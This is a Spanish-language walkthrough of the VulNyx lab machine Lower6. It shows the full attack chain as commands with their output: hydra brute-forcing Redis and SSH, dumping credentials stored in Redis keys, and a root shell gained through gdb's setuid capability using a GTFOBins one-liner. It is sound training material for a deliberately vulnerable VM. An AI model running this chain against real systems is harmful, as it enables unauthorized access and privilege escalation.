VulNyx - Lower6
Information
Lower6 es una máquina virtual vulnerable Linux de dificultad baja de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.108
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 09:19 CEST
Nmap scan report for 192.168.1.108
Host is up (0.000098s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6379/tcp open redis
❯ nmap -sVC -p22,6379 192.168.1.108
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 09:20 CEST
Nmap scan report for 192.168.1.108
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
6379/tcp open redis Redis key-value store
Shell (killer)
6379/TCP (REDIS)
Auth (Null Session)
Al intentar acceder a Redis sin credenciales solicita un password
❯ redis-cli -h 192.168.1.108 PING
(error) NOAUTH Authentication required.
Password Brute Force
Con hydra obtengo el password hellow
❯ hydra -t 64 redis://192.168.1.108 -P /opt/techyou.txt
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-25 09:24:31
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:10000), ~157 tries per task
[DATA] attacking redis://192.168.1.108:6379/
[6379][redis] host: 192.168.1.108 password: hellow
Auth (Password)
Accedo con las credenciales obtenidas y encuentro varias KEYS
❯ redis-cli -h 192.168.1.108 -a hellow KEYS '*' 2>/dev/null
1) "key4"
2) "key2"
3) "key5"
4) "key3"
5) "key1"
Realizo un dumpeo de todas las KEYS y encuentro credenciales de varios usuarios
❯ redis-cli -h 192.168.1.108 -a hellow MGET key1 key2 key3 key4 key5 2>/dev/null
1) "killer:K!ll3R123"
2) "ghost:Ghost!Hunter42"
3) "snake:Pixel_Sn4ke77"
4) "wolf:CyberWolf#21"
5) "shadow:ShadowMaze@9"
Ahora creo un wordlist de usuarios y otro de passwords
❯ redis-cli -h 192.168.1.108 -a hellow MGET key1 key2 key3 key4 key5 2>/dev/null |awk '{print $1}' |cut -d ':' -f1 >users.dic
❯ redis-cli -h 192.168.1.108 -a hellow MGET key1 key2 key3 key4 key5 2>/dev/null |awk '{print $1}' |cut -d ':' -f2 >pass.dic
22/TCP (SSH)
Credentials Brute Force
Con hydra obtengo éxito con las credenciales killer:ShadowMaze@9
❯ hydra -t 64 -L users.dic -P pass.dic ssh://192.168.1.108
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-25 09:33:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 25 tasks per 1 server, overall 25 tasks, 25 login tries (l:5/p:5), ~1 try per task
[DATA] attacking ssh://192.168.1.108:22/
[22][ssh] host: 192.168.1.108 login: killer password: ShadowMaze@9
Accedo al sistema como usuario killer
❯ sshpass -p 'ShadowMaze@9' ssh killer@192.168.1.108 -o StrictHostKeyChecking=no
killer@lower6:~$ id ; hostname
uid=1000(killer) gid=1000(killer) grupos=1000(killer)
lower6
Privilege Escalation
Enumeration
Capabilities
El usuario killer dispone de permisos de tipo capabilities sobre el el binario gdb
killer@lower6:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep
Abuse
En GTFOBins nos dan la secuencia de shell-escape y me convierto en usuario root
killer@lower6:~$ /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
GNU gdb (Debian 13.1-3) 13.1
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
# bash -pi
root@lower6:~# id ; hostname
uid=0(root) gid=1000(killer) grupos=1000(killer)
lower6
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@lower6:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
03f4****************************
8ec0****************************
Hasta aquí la resolución de la máquina Lower6.
Happy Hacking!